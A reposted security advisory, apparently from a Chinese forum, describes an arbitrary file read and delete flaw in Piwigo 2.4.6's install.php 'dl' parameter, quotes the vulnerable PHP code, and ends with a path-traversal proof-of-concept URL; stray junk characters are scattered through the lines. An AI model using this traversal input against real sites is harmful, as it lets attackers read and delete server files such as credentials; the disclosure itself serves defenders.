Piwigo是用PHP编写的相册脚本。7 N2 x! ^- @ _" A
# j5 G( N4 [3 y2 h6 ^ [4 SPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
0 k6 L% ]9 G, ^& s- B====================================================================
: O/ D: q$ Y' Z: }9 a" H' k# @ X% B/install.php:4 t# v1 @" P2 K/ _8 y! \9 l- a
-------------# P7 |# t. S% E9 Q! v
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
. I: z6 |4 g! Y- N114: {
% T5 K* [( f6 A5 {3 i' r: W2 N115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];) P6 f/ n6 J9 l, S L
116: header('Cache-Control: no-cache, must-revalidate');1 @2 d" x5 e Y. ?
117: header('Pragma: no-cache');
' w! ]* X4 f3 ^8 C118: header('Content-Disposition: attachment; filename="database.inc.php"');
9 M: g% h( ?1 V3 |# b! A& h6 z% z119: header('Content-Transfer-Encoding: binary');8 R, M) u ?; U
120: header('Content-Length: '.filesize($filename));8 I% V" x% K R; Q. {# ]
121: echo file_get_contents($filename);
* _9 O0 z# P# m9 b122: unlink($filename);
9 W$ g+ u2 ~) D) q123: exit();
/ C, Q* w- F7 D) c124: }# |! |9 C0 d& [$ u. I1 F
====================================================================
, D4 S. I+ y) v3 S% g! [ 8 [2 J" U6 {4 L8 x& x
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)4 ]* m, m# o' m" @0 M) [! k
Apache 2.4.2 (Win32)3 x) q# C8 g# w- S) y# h
PHP 5.4.4" ^9 W& W; S. l/ ^& c
MySQL 5.5.25a. a- H8 }6 W0 K' K2 G0 F
) c$ |/ Z8 R0 r" G+ q1 MVulnerability discovered by Gjoko 'LiquidWorm' Krstic
" R: l4 x, d1 u4 K @zeroscience! h4 L: H ]5 J
$ I. M8 v, m" g; U, E
Advisory ID: ZSL-2013-5127
$ ~! F$ H, u) t5 t4 ^, EAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php2 W/ @% g+ L) @; I- E, r5 \
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
2 D' Y4 H, K$ m
- J3 x+ q1 E6 n- E$ ]2 M15.02.2013) F% K/ F: O+ t. `: M( |. q
3 D/ m d4 j' _' W4 t-- O7 D5 }/ _+ r9 Z* E
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
& X0 q/ N+ V4 n: w. I
# x* h `/ B9 _7 v |